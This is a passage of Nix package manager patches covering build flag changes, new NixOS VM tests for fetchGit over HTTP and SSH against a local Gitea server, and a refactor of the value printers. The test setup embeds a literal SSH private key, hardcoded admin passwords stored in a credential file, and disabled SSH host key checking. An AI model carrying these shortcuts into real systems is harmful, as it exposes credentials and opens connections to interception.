b/src/libutil/local.mk @@ -8,7 +8,7 @@ libutil_SOURCES := $(wildcard $(d)/*.cc $(d)/signature/*.cc) libutil_CXXFLAGS += -I src/libutil -libutil_LDFLAGS += -pthread $(LIBCURL_LIBS) $(SODIUM_LIBS) $(OPENSSL_LIBS) $(LIBBROTLI_LIBS) $(LIBARCHIVE_LIBS) $(BOOST_LDFLAGS) -lboost_context +libutil_LDFLAGS += $(THREAD_LDFLAGS) $(LIBCURL_LIBS) $(SODIUM_LIBS) $(OPENSSL_LIBS) $(LIBBROTLI_LIBS) $(LIBARCHIVE_LIBS) $(BOOST_LDFLAGS) -lboost_context $(foreach i, $(wildcard $(d)/args/*.hh), \ $(eval $(call install-file-in, $(i), $(includedir)/nix/args, 0644))) diff --git a/src/nix/local.mk b/src/nix/local.mk index a21aa705f..1d6f560d6 100644 --- a/src/nix/local.mk +++ b/src/nix/local.mk @@ -18,7 +18,7 @@ nix_CXXFLAGS += -I src/libutil -I src/libstore -I src/libfetchers -I src/libexpr nix_LIBS = libexpr libmain libfetchers libstore libutil libcmd -nix_LDFLAGS = -pthread $(SODIUM_LIBS) $(EDITLINE_LIBS) $(BOOST_LDFLAGS) $(LOWDOWN_LIBS) +nix_LDFLAGS = $(THREAD_LDFLAGS) $(SODIUM_LIBS) $(EDITLINE_LIBS) $(BOOST_LDFLAGS) $(LOWDOWN_LIBS) $(foreach name, \ nix-build nix-channel nix-collect-garbage nix-copy-closure nix-daemon nix-env nix-hash nix-instantiate nix-prefetch-url nix-shell nix-store, \ diff --git a/tests/functional/test-libstoreconsumer/local.mk b/tests/functional/test-libstoreconsumer/local.mk index edc140723..a1825c405 100644 --- a/tests/functional/test-libstoreconsumer/local.mk +++ b/tests/functional/test-libstoreconsumer/local.mk @@ -12,4 +12,4 @@ test-libstoreconsumer_CXXFLAGS += -I src/libutil -I src/libstore test-libstoreconsumer_LIBS = libstore libutil -test-libstoreconsumer_LDFLAGS = -pthread $(SODIUM_LIBS) $(EDITLINE_LIBS) $(BOOST_LDFLAGS) $(LOWDOWN_LIBS) +test-libstoreconsumer_LDFLAGS = $(THREAD_LDFLAGS) $(SODIUM_LIBS) $(EDITLINE_LIBS) $(BOOST_LDFLAGS) $(LOWDOWN_LIBS) diff --git a/tests/unit/libexpr-support/local.mk b/tests/unit/libexpr-support/local.mk index 12a76206a..0501de33c 100644 --- a/tests/unit/libexpr-support/local.mk +++ b/tests/unit/libexpr-support/local.mk @@ 
-20,4 +20,4 @@ libexpr-test-support_LIBS = \ libstore-test-support libutil-test-support \ libexpr libstore libutil -libexpr-test-support_LDFLAGS := -pthread -lrapidcheck +libexpr-test-support_LDFLAGS := $(THREAD_LDFLAGS) -lrapidcheck diff --git a/tests/unit/libstore-support/local.mk b/tests/unit/libstore-support/local.mk index ff075c96a..56dedd825 100644 --- a/tests/unit/libstore-support/local.mk +++ b/tests/unit/libstore-support/local.mk @@ -18,4 +18,4 @@ libstore-test-support_LIBS = \ libutil-test-support \ libstore libutil -libstore-test-support_LDFLAGS := -pthread -lrapidcheck +libstore-test-support_LDFLAGS := $(THREAD_LDFLAGS) -lrapidcheck diff --git a/tests/unit/libutil-support/local.mk b/tests/unit/libutil-support/local.mk index 2ee2cdb6c..5f7835c9f 100644 --- a/tests/unit/libutil-support/local.mk +++ b/tests/unit/libutil-support/local.mk @@ -16,4 +16,4 @@ libutil-test-support_CXXFLAGS += $(libutil-tests_EXTRA_INCLUDES) libutil-test-support_LIBS = libutil -libutil-test-support_LDFLAGS := -pthread -lrapidcheck +libutil-test-support_LDFLAGS := $(THREAD_LDFLAGS) -lrapidcheck From 813c113b9ecfab917e6d43ac5831a4f207fecaf0 Mon Sep 17 00:00:00 2001 From: DavHau Date: Fri, 29 Dec 2023 15:15:16 +0700 Subject: [PATCH 215/654] initialize test suite for git fetchers solves #9388 This utilizes nixos vm tests to allow: - writing tests for fetchTree and fetchGit involving actual networking. - writing small independent test cases by automating local and remote repository setup per test case. This adds: - a gitea module setting up a gitea server - a setup module that simplifies writing test cases by automating the repo setup. - a simple git http test case Other improvements: For all nixos tests, add capability of overriding the nix version to test against. This should make it easier to prevent regressions. If a new test is added it can simply be ran against any older nix version without having to backport the test. 
For example, for running the container tests against nix 2.12.0: `nix build "$(nix eval --raw .#hydraJobs.tests.containers --impure --apply 't: (t.forNix "2.12.0").drvPath')^*" -L` --- tests/nixos/default.nix | 30 ++++-- tests/nixos/fetch-git/default.nix | 60 +++++++++++ tests/nixos/fetch-git/testsupport/gitea.nix | 63 ++++++++++++ tests/nixos/fetch-git/testsupport/setup.nix | 106 ++++++++++++++++++++ 4 files changed, 252 insertions(+), 7 deletions(-) create mode 100644 tests/nixos/fetch-git/default.nix create mode 100644 tests/nixos/fetch-git/testsupport/gitea.nix create mode 100644 tests/nixos/fetch-git/testsupport/setup.nix diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix index 4459aa664..1a42f886c 100644 --- a/tests/nixos/default.nix +++ b/tests/nixos/default.nix @@ -5,14 +5,28 @@ let nixos-lib = import (nixpkgs + "/nixos/lib") { }; # https://nixos.org/manual/nixos/unstable/index.html#sec-calling-nixos-tests - runNixOSTestFor = system: test: nixos-lib.runTest { - imports = [ test ]; - hostPkgs = nixpkgsFor.${system}.native; - defaults = { - nixpkgs.pkgs = nixpkgsFor.${system}.native; + runNixOSTestFor = system: test: + (nixos-lib.runTest { + imports = [ test ]; + hostPkgs = nixpkgsFor.${system}.native; + defaults = { + nixpkgs.pkgs = nixpkgsFor.${system}.native; + nix.checkAllErrors = false; + }; + _module.args.nixpkgs = nixpkgs; + _module.args.system = system; + }) + // { + # allow running tests against older nix versions via `nix eval --apply` + # Example: + # nix build "$(nix eval --raw --impure .#hydraJobs.tests.fetch-git --apply 't: (t.forNix "2.19.2").drvPath')^*" + forNix = nixVersion: runNixOSTestFor system { + imports = [test]; + defaults.nixpkgs.overlays = [(curr: prev: { + nix = (builtins.getFlake "nix/${nixVersion}").packages.${system}.nix; + })]; + }; }; - _module.args.nixpkgs = nixpkgs; - }; in @@ -40,4 +54,6 @@ in setuid = lib.genAttrs ["i686-linux" "x86_64-linux"] (system: runNixOSTestFor system ./setuid.nix); + + fetch-git = 
runNixOSTestFor "x86_64-linux" ./fetch-git; } diff --git a/tests/nixos/fetch-git/default.nix b/tests/nixos/fetch-git/default.nix new file mode 100644 index 000000000..abeefb0e3 --- /dev/null +++ b/tests/nixos/fetch-git/default.nix @@ -0,0 +1,60 @@ +{ lib, config, ... }: +{ + name = "fetch-git"; + + imports = [ + ./testsupport/gitea.nix + ]; + + /* + Test cases + The following is set up automatically for each test case: + - a repo with the {name} is created on the gitea server + - a repo with the {name} is created on the client + - the client repo is configured to push to the server repo + Python variables: + - repo.path: the path to the directory of the client repo + - repo.git: the git command with the client repo as the working directory + - repo.remote: the url to the server repo + */ + testCases = [ + { + name = "simple-http"; + description = "can fetch a git repo via http"; + script = '' + # add a file to the repo + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' + """) + + # memoize the revision + rev1 = client.succeed(f""" + {repo.git} rev-parse HEAD + """).strip() + + # push to the server + client.succeed(f""" + {repo.git} push origin main + """) + + # fetch the repo via nix + fetched1 = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).outPath" + """) + + # check if the committed file is there + client.succeed(f""" + test -f {fetched1}/thailand + """) + + # check if the revision is the same + rev1_fetched = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).rev" + """).strip() + assert rev1 == rev1_fetched + ''; + } + ]; +} diff --git a/tests/nixos/fetch-git/testsupport/gitea.nix b/tests/nixos/fetch-git/testsupport/gitea.nix new file mode 100644 index 000000000..d2bd622e4 --- /dev/null +++ b/tests/nixos/fetch-git/testsupport/gitea.nix @@ -0,0 +1,63 @@ +{ lib, nixpkgs, system, ... 
}: { + imports = [ + ../testsupport/setup.nix + ]; + nodes = { + gitea = { pkgs, ... }: { + services.gitea.enable = true; + services.gitea.settings.service.DISABLE_REGISTRATION = true; + services.gitea.settings.log.LEVEL = "Info"; + services.gitea.settings.database.LOG_SQL = false; + networking.firewall.allowedTCPPorts = [ 3000 ]; + environment.systemPackages = [ pkgs.gitea ]; + + # TODO: remove this after updating to nixos-23.11 + nixpkgs.pkgs = lib.mkForce (import nixpkgs { + inherit system; + config.permittedInsecurePackages = [ + "gitea-1.19.4" + ]; + }); + }; + client = { pkgs, ... }: { + environment.systemPackages = [ pkgs.git ]; + }; + }; + defaults = { pkgs, ... }: { + environment.systemPackages = [ pkgs.jq ]; + }; + + setupScript = '' + import shlex + + gitea.wait_for_unit("gitea.service") + + gitea_admin = "test" + gitea_admin_password = "test123test" + + gitea.succeed(f""" + gitea --version >&2 + su -l gitea -c 'GITEA_WORK_DIR=/var/lib/gitea gitea admin user create \ + --username {gitea_admin} --password {gitea_admin_password} --email test@client' + """) + + client.wait_for_unit("multi-user.target") + gitea.wait_for_open_port(3000) + + gitea_admin_token = gitea.succeed(f""" + curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/users/test/tokens \ + -H 'Accept: application/json' -H 'Content-Type: application/json' \ + -d {shlex.quote( '{"name":"token", "scopes":["all"]}' )} \ + | jq -r '.sha1' + """).strip() + + client.succeed(f""" + echo "http://{gitea_admin}:{gitea_admin_password}@gitea:3000" >~/.git-credentials-admin + git config --global credential.helper 'store --file ~/.git-credentials-admin' + git config --global user.email "test@client" + git config --global user.name "Test User" + git config --global gc.autodetach 0 + git config --global gc.auto 0 + """) + ''; +} diff --git a/tests/nixos/fetch-git/testsupport/setup.nix b/tests/nixos/fetch-git/testsupport/setup.nix new file mode 100644 index 000000000..f2fbd737d --- 
/dev/null +++ b/tests/nixos/fetch-git/testsupport/setup.nix @@ -0,0 +1,106 @@ +{ lib, config, extendModules, ... }: +let + inherit (lib) + mkOption + types + ; + + indent = lib.replaceStrings ["\n"] ["\n "]; + + execTestCase = testCase: '' + + ### TEST ${testCase.name}: ${testCase.description} ### + + with subtest("${testCase.description}"): + repo = Repo("${testCase.name}") + ${indent testCase.script} + ''; +in +{ + + options = { + setupScript = mkOption { + type = types.lines; + description = '' + Python code that runs before the main test. + + Variables defined by this code will be available in the test. + ''; + default = ""; + }; + testCases = mkOption { + description = '' + The test cases. See `testScript`. + ''; + type = types.listOf (types.submodule { + options.name = mkOption { + type = types.str; + description = '' + The name of the test case. + + A repository with that name will be set up on the gitea server and locally. + + This name can also be used to execute only a single test case via: + `nix build .#hydraJobs.fetch-git.{test-case-name}` + ''; + }; + options.description = mkOption { + type = types.str; + description = '' + A description of the test case. + ''; + }; + options.script = mkOption { + type = types.lines; + description = '' + Python code that runs the test. + + Variables defined by `setupScript` will be available here. + ''; + }; + }); + }; + }; + + config = { + nodes.client = { + environment.variables = { + _NIX_FORCE_HTTP = "1"; + }; + nix.settings.experimental-features = ["nix-command" "flakes"]; + }; + setupScript = '' + class Repo: + """ + A class to create a git repository on the gitea server and locally. 
+ """ + def __init__(self, name): + self.name = name + self.path = "/tmp/repos/" + name + self.remote = "http://gitea:3000/test/" + name + self.git = f"git -C {self.path}" + self.create() + + def create(self): + gitea.succeed(f""" + curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/user/repos \ + -H 'Accept: application/json' -H 'Content-Type: application/json' \ + -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main"}}' )} + """) + client.succeed(f""" + mkdir -p {self.path} \ + && git init -b main {self.path} \ + && {self.git} remote add origin {self.remote} + """) + ''; + testScript = '' + start_all(); + + ${config.setupScript} + + ### SETUP COMPLETE ### + + ${lib.concatStringsSep "\n" (map execTestCase config.testCases)} + ''; + }; +} From 0f95330fde6ebad95b5a50be3aacb0a1d11363af Mon Sep 17 00:00:00 2001 From: DavHau Date: Thu, 11 Jan 2024 14:41:35 +0700 Subject: [PATCH 216/654] fetchGit: add simple test for ssh fetching Also move tests to separate files which are auto-imported. 
This should allow people adding tests concurrently without introducing merge conflicts --- tests/nixos/fetch-git/default.nix | 52 +++++-------------- .../test-cases/http-simple/default.nix | 37 +++++++++++++ .../test-cases/ssh-simple/default.nix | 41 +++++++++++++++ tests/nixos/fetch-git/testsupport/gitea.nix | 41 ++++++++++++++- tests/nixos/fetch-git/testsupport/setup.nix | 10 +++- 5 files changed, 138 insertions(+), 43 deletions(-) create mode 100644 tests/nixos/fetch-git/test-cases/http-simple/default.nix create mode 100644 tests/nixos/fetch-git/test-cases/ssh-simple/default.nix diff --git a/tests/nixos/fetch-git/default.nix b/tests/nixos/fetch-git/default.nix index abeefb0e3..254fecaaf 100644 --- a/tests/nixos/fetch-git/default.nix +++ b/tests/nixos/fetch-git/default.nix @@ -8,53 +8,25 @@ /* Test cases + + Test cases are automatically imported from ./test-cases/{name} + The following is set up automatically for each test case: - a repo with the {name} is created on the gitea server - a repo with the {name} is created on the client - the client repo is configured to push to the server repo + Python variables: - repo.path: the path to the directory of the client repo - repo.git: the git command with the client repo as the working directory - repo.remote: the url to the server repo */ - testCases = [ - { - name = "simple-http"; - description = "can fetch a git repo via http"; - script = '' - # add a file to the repo - client.succeed(f""" - echo chiang-mai > {repo.path}/thailand \ - && {repo.git} add thailand \ - && {repo.git} commit -m 'commit1' - """) - - # memoize the revision - rev1 = client.succeed(f""" - {repo.git} rev-parse HEAD - """).strip() - - # push to the server - client.succeed(f""" - {repo.git} push origin main - """) - - # fetch the repo via nix - fetched1 = client.succeed(f""" - nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).outPath" - """) - - # check if the committed file is there - client.succeed(f""" - test -f 
{fetched1}/thailand - """) - - # check if the revision is the same - rev1_fetched = client.succeed(f""" - nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).rev" - """).strip() - assert rev1 == rev1_fetched - ''; - } - ]; + testCases = + map + (testCaseName: {...}: { + imports = ["${./test-cases}/${testCaseName}"]; + # ensures tests are named like their directories they are defined in + name = testCaseName; + }) + (lib.attrNames (builtins.readDir ./test-cases)); } diff --git a/tests/nixos/fetch-git/test-cases/http-simple/default.nix b/tests/nixos/fetch-git/test-cases/http-simple/default.nix new file mode 100644 index 000000000..1bd5bbba2 --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/http-simple/default.nix @@ -0,0 +1,37 @@ +{ + description = "can fetch a git repo via http"; + script = '' + # add a file to the repo + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' + """) + + # memoize the revision + rev1 = client.succeed(f""" + {repo.git} rev-parse HEAD + """).strip() + + # push to the server + client.succeed(f""" + {repo.git} push origin main + """) + + # fetch the repo via nix + fetched1 = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).outPath" + """) + + # check if the committed file is there + client.succeed(f""" + test -f {fetched1}/thailand + """) + + # check if the revision is the same + rev1_fetched = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).rev" + """).strip() + assert rev1 == rev1_fetched, f"rev1: {rev1} != rev1_fetched: {rev1_fetched}" + ''; +} diff --git a/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix new file mode 100644 index 000000000..0e4494ae0 --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix @@ -0,0 +1,41 @@ +{ + description = "can fetch a git repo via ssh"; + script 
= '' + # add a file to the repo + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' + """) + + # memoize the revision + rev1 = client.succeed(f""" + {repo.git} rev-parse HEAD + """).strip() + + # push to the server + client.succeed(f""" + {repo.git} push origin-ssh main + """) + + # fetch the repo via nix + fetched1 = client.succeed(f""" + nix eval --impure --raw --expr ' + (builtins.fetchGit "{repo.remote_ssh}").outPath + ' + """) + + # check if the committed file is there + client.succeed(f""" + test -f {fetched1}/thailand + """) + + # check if the revision is the same + rev1_fetched = client.succeed(f""" + nix eval --impure --raw --expr ' + (builtins.fetchGit "{repo.remote_ssh}").rev + ' + """).strip() + assert rev1 == rev1_fetched, f"rev1: {rev1} != rev1_fetched: {rev1_fetched}" + ''; +} diff --git a/tests/nixos/fetch-git/testsupport/gitea.nix b/tests/nixos/fetch-git/testsupport/gitea.nix index d2bd622e4..2ea23961e 100644 --- a/tests/nixos/fetch-git/testsupport/gitea.nix +++ b/tests/nixos/fetch-git/testsupport/gitea.nix @@ -1,4 +1,18 @@ -{ lib, nixpkgs, system, ... }: { +{ lib, nixpkgs, system, pkgs, ... 
}: let + clientPrivateKey = pkgs.writeText "id_ed25519" '' + -----BEGIN OPENSSH PRIVATE KEY----- + b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW + QyNTUxOQAAACBbeWvHh/AWGWI6EIc1xlSihyXtacNQ9KeztlW/VUy8wQAAAJAwVQ5VMFUO + VQAAAAtzc2gtZWQyNTUxOQAAACBbeWvHh/AWGWI6EIc1xlSihyXtacNQ9KeztlW/VUy8wQ + AAAEB7lbfkkdkJoE+4TKHPdPQWBKLSx+J54Eg8DaTr+3KoSlt5a8eH8BYZYjoQhzXGVKKH + Je1pw1D0p7O2Vb9VTLzBAAAACGJmb0BtaW5pAQIDBAU= + -----END OPENSSH PRIVATE KEY----- + ''; + + clientPublicKey = + "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFt5a8eH8BYZYjoQhzXGVKKHJe1pw1D0p7O2Vb9VTLzB"; + +in { imports = [ ../testsupport/setup.nix ]; @@ -8,8 +22,11 @@ services.gitea.settings.service.DISABLE_REGISTRATION = true; services.gitea.settings.log.LEVEL = "Info"; services.gitea.settings.database.LOG_SQL = false; + services.openssh.enable = true; networking.firewall.allowedTCPPorts = [ 3000 ]; - environment.systemPackages = [ pkgs.gitea ]; + environment.systemPackages = [ pkgs.git pkgs.gitea ]; + + users.users.root.openssh.authorizedKeys.keys = [clientPublicKey]; # TODO: remove this after updating to nixos-23.11 nixpkgs.pkgs = lib.mkForce (import nixpkgs { @@ -59,5 +76,25 @@ git config --global gc.autodetach 0 git config --global gc.auto 0 """) + + # add client's private key to ~/.ssh + client.succeed(""" + mkdir -p ~/.ssh + chmod 700 ~/.ssh + cat ${clientPrivateKey} >~/.ssh/id_ed25519 + chmod 600 ~/.ssh/id_ed25519 + """) + + client.succeed(""" + echo "Host gitea" >>~/.ssh/config + echo " StrictHostKeyChecking no" >>~/.ssh/config + echo " UserKnownHostsFile /dev/null" >>~/.ssh/config + echo " User root" >>~/.ssh/config + """) + + # ensure ssh from client to gitea works + client.succeed(""" + ssh root@gitea true + """) ''; } diff --git a/tests/nixos/fetch-git/testsupport/setup.nix b/tests/nixos/fetch-git/testsupport/setup.nix index f2fbd737d..2f74f51f8 100644 --- a/tests/nixos/fetch-git/testsupport/setup.nix +++ b/tests/nixos/fetch-git/testsupport/setup.nix @@ -78,19 +78,27 @@ in 
self.name = name self.path = "/tmp/repos/" + name self.remote = "http://gitea:3000/test/" + name + self.remote_ssh = "ssh://gitea/root/" + name self.git = f"git -C {self.path}" self.create() def create(self): + # create ssh remote repo + gitea.succeed(f""" + git init --bare -b main /root/{self.name} + """) + # create http remote repo gitea.succeed(f""" curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/user/repos \ -H 'Accept: application/json' -H 'Content-Type: application/json' \ -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main"}}' )} """) + # setup git remotes on client client.succeed(f""" mkdir -p {self.path} \ && git init -b main {self.path} \ - && {self.git} remote add origin {self.remote} + && {self.git} remote add origin {self.remote} \ + && {self.git} remote add origin-ssh root@gitea:{self.name} """) ''; testScript = '' From a923444a9462cd2fabcd816fa2e9cb54c485f13f Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 11 Jan 2024 13:55:28 -0500 Subject: [PATCH 217/654] packages.nix: Fix `installUnitTests` condition The intent was we install the tests when we can *not* run them. Instead, we were installing them when we can. --- package.nix | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/package.nix b/package.nix index 71ee80e33..37410dc2f 100644 --- a/package.nix +++ b/package.nix @@ -100,7 +100,7 @@ # Whether to install unit tests. This is useful when cross compiling # since we cannot run them natively during the build, but can do so # later. -, installUnitTests ? __forDefaults.canRunInstalled +, installUnitTests ? doBuild && !__forDefaults.canExecuteHost # For running the functional tests against a pre-built Nix. Probably # want to use in conjunction with `doBuild = false;`. @@ -113,7 +113,8 @@ # Not a real argument, just the only way to approximate let-binding some # stuff for argument defaults. , __forDefaults ? 
{ - canRunInstalled = doBuild && stdenv.buildPlatform.canExecute stdenv.hostPlatform; + canExecuteHost = stdenv.buildPlatform.canExecute stdenv.hostPlatform; + canRunInstalled = doBuild && __forDefaults.canExecuteHost; } }: From c9125603a535f82cc9a53f47533f0a3d174e7008 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 18 Dec 2023 10:34:19 -0800 Subject: [PATCH 218/654] Unindent `print.hh` declarations --- src/libexpr/print.hh | 82 +++++++++++++++++++++++--------------------- 1 file changed, 42 insertions(+), 40 deletions(-) diff --git a/src/libexpr/print.hh b/src/libexpr/print.hh index 3b72ae201..abf830864 100644 --- a/src/libexpr/print.hh +++ b/src/libexpr/print.hh @@ -10,45 +10,47 @@ #include namespace nix { - /** - * Print a string as a Nix string literal. - * - * Quotes and fairly minimal escaping are added. - * - * @param s The logical string - */ - std::ostream & printLiteralString(std::ostream & o, std::string_view s); - inline std::ostream & printLiteralString(std::ostream & o, const char * s) { - return printLiteralString(o, std::string_view(s)); - } - inline std::ostream & printLiteralString(std::ostream & o, const std::string & s) { - return printLiteralString(o, std::string_view(s)); - } - /** Print `true` or `false`. */ - std::ostream & printLiteralBool(std::ostream & o, bool b); - - /** - * Print a string as an attribute name in the Nix expression language syntax. - * - * Prints a quoted string if necessary. - */ - std::ostream & printAttributeName(std::ostream & o, std::string_view s); - - /** - * Returns `true' is a string is a reserved keyword which requires quotation - * when printing attribute set field names. - */ - bool isReservedKeyword(const std::string_view str); - - /** - * Print a string as an identifier in the Nix expression language syntax. - * - * FIXME: "identifier" is ambiguous. Identifiers do not have a single - * textual representation. 
They can be used in variable references, - * let bindings, left-hand sides or attribute names in a select - * expression, or something else entirely, like JSON. Use one of the - * `print*` functions instead. - */ - std::ostream & printIdentifier(std::ostream & o, std::string_view s); +/** + * Print a string as a Nix string literal. + * + * Quotes and fairly minimal escaping are added. + * + * @param s The logical string + */ +std::ostream & printLiteralString(std::ostream & o, std::string_view s); +inline std::ostream & printLiteralString(std::ostream & o, const char * s) { + return printLiteralString(o, std::string_view(s)); +} +inline std::ostream & printLiteralString(std::ostream & o, const std::string & s) { + return printLiteralString(o, std::string_view(s)); +} + +/** Print `true` or `false`. */ +std::ostream & printLiteralBool(std::ostream & o, bool b); + +/** + * Print a string as an attribute name in the Nix expression language syntax. + * + * Prints a quoted string if necessary. + */ +std::ostream & printAttributeName(std::ostream & o, std::string_view s); + +/** + * Returns `true' is a string is a reserved keyword which requires quotation + * when printing attribute set field names. + */ +bool isReservedKeyword(const std::string_view str); + +/** + * Print a string as an identifier in the Nix expression language syntax. + * + * FIXME: "identifier" is ambiguous. Identifiers do not have a single + * textual representation. They can be used in variable references, + * let bindings, left-hand sides or attribute names in a select + * expression, or something else entirely, like JSON. Use one of the + * `print*` functions instead. 
+ */ +std::ostream & printIdentifier(std::ostream & o, std::string_view s); + } From 0fa08b451682fb3311fe58112ff05c4fe5bee3a4 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Tue, 12 Dec 2023 13:57:36 -0800 Subject: [PATCH 219/654] Unify and refactor value printing Previously, there were two mostly-identical value printers -- one in `libexpr/eval.cc` (which didn't force values) and one in `libcmd/repl.cc` (which did force values and also printed ANSI color codes). This PR unifies both of these printers into `print.cc` and provides a `PrintOptions` struct for controlling the output, which allows for toggling whether values are forced, whether repeated values are tracked, and whether ANSI color codes are displayed. Additionally, `PrintOptions` allows tuning the maximum number of attributes, list items, and bytes in a string that will be displayed; this makes it ideal for contexts where printing too much output (e.g. all of Nixpkgs) is distracting. (As requested by @roberth in https://github.com/NixOS/nix/pull/9554#issuecomment-1845095735) Please read the tests for example output. Future work: - It would be nice to provide this function as a builtin, perhaps `builtins.toStringDebug` -- a printing function that never fails would be useful when debugging Nix code. - It would be nice to support customizing `PrintOptions` members on the command line, e.g. `--option to-string-max-attrs 1000`. 
--- src/libcmd/repl.cc | 158 +---- src/libexpr/eval.cc | 126 +--- src/libexpr/eval.hh | 4 +- src/libexpr/print-options.hh | 52 ++ src/libexpr/print.cc | 416 +++++++++++- src/libexpr/print.hh | 6 + src/libexpr/value.hh | 17 +- src/libutil/english.cc | 18 + src/libutil/english.hh | 18 + src/nix-env/user-env.cc | 5 +- src/nix-instantiate/nix-instantiate.cc | 2 +- tests/functional/lang/eval-okay-print.err.exp | 2 +- tests/functional/lang/eval-okay-print.exp | 2 +- .../lang/eval-okay-repeated-empty-attrs.exp | 1 + .../lang/eval-okay-repeated-empty-attrs.nix | 2 + .../lang/eval-okay-repeated-empty-list.exp | 1 + .../lang/eval-okay-repeated-empty-list.nix | 1 + tests/unit/libexpr/value/print.cc | 621 +++++++++++++++++- 18 files changed, 1174 insertions(+), 278 deletions(-) create mode 100644 src/libexpr/print-options.hh create mode 100644 src/libutil/english.cc create mode 100644 src/libutil/english.hh create mode 100644 tests/functional/lang/eval-okay-repeated-empty-attrs.exp create mode 100644 tests/functional/lang/eval-okay-repeated-empty-attrs.nix create mode 100644 tests/functional/lang/eval-okay-repeated-empty-list.exp create mode 100644 tests/functional/lang/eval-okay-repeated-empty-list.nix diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 7a1df74ef..72e3559df 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -93,9 +93,17 @@ struct NixRepl void evalString(std::string s, Value & v); void loadDebugTraceEnv(DebugTrace & dt); - typedef std::set ValuesSeen; - std::ostream & printValue(std::ostream & str, Value & v, unsigned int maxDepth); - std::ostream & printValue(std::ostream & str, Value & v, unsigned int maxDepth, ValuesSeen & seen); + void printValue(std::ostream & str, + Value & v, + unsigned int maxDepth = std::numeric_limits::max()) + { + ::nix::printValue(*state, str, v, PrintOptions { + .ansiColors = true, + .force = true, + .derivationPaths = true, + .maxDepth = maxDepth + }); + } }; std::string removeWhitespace(std::string s) @@ -708,7 
+716,8 @@ bool NixRepl::processLine(std::string line) else if (command == ":p" || command == ":print") { Value v; evalString(arg, v); - printValue(std::cout, v, 1000000000) << std::endl; + printValue(std::cout, v); + std::cout << std::endl; } else if (command == ":q" || command == ":quit") { @@ -770,7 +779,8 @@ bool NixRepl::processLine(std::string line) } else { Value v; evalString(line, v); - printValue(std::cout, v, 1) << std::endl; + printValue(std::cout, v, 1); + std::cout << std::endl; } } @@ -892,144 +902,6 @@ void NixRepl::evalString(std::string s, Value & v) } -std::ostream & NixRepl::printValue(std::ostream & str, Value & v, unsigned int maxDepth) -{ - ValuesSeen seen; - return printValue(str, v, maxDepth, seen); -} - - - - -// FIXME: lot of cut&paste from Nix's eval.cc. -std::ostream & NixRepl::printValue(std::ostream & str, Value & v, unsigned int maxDepth, ValuesSeen & seen) -{ - str.flush(); - checkInterrupt(); - - state->forceValue(v, v.determinePos(noPos)); - - switch (v.type()) { - - case nInt: - str << ANSI_CYAN << v.integer << ANSI_NORMAL; - break; - - case nBool: - str << ANSI_CYAN; - printLiteralBool(str, v.boolean); - str << ANSI_NORMAL; - break; - - case nString: - str << ANSI_WARNING; - printLiteralString(str, v.string_view()); - str << ANSI_NORMAL; - break; - - case nPath: - str << ANSI_GREEN << v.path().to_string() << ANSI_NORMAL; // !!! escaping? 
- break; - - case nNull: - str << ANSI_CYAN "null" ANSI_NORMAL; - break; - - case nAttrs: { - seen.insert(&v); - - bool isDrv = state->isDerivation(v); - - if (isDrv) { - str << "«derivation "; - Bindings::iterator i = v.attrs->find(state->sDrvPath); - NixStringContext context; - if (i != v.attrs->end()) - str << state->store->printStorePath(state->coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation")); - else - str << "???"; - str << "»"; - } - - else if (maxDepth > 0) { - str << "{ "; - - typedef std::map Sorted; - Sorted sorted; - for (auto & i : *v.attrs) - sorted.emplace(state->symbols[i.name], i.value); - - for (auto & i : sorted) { - printAttributeName(str, i.first); - str << " = "; - if (seen.count(i.second)) - str << "«repeated»"; - else - try { - printValue(str, *i.second, maxDepth - 1, seen); - } catch (AssertionError & e) { - str << ANSI_RED "«error: " << e.msg() << "»" ANSI_NORMAL; - } - str << "; "; - } - - str << "}"; - } else - str << "{ ... }"; - - break; - } - - case nList: - seen.insert(&v); - - str << "[ "; - if (maxDepth > 0) - for (auto elem : v.listItems()) { - if (seen.count(elem)) - str << "«repeated»"; - else - try { - printValue(str, *elem, maxDepth - 1, seen); - } catch (AssertionError & e) { - str << ANSI_RED "«error: " << e.msg() << "»" ANSI_NORMAL; - } - str << " "; - } - else - str << "... 
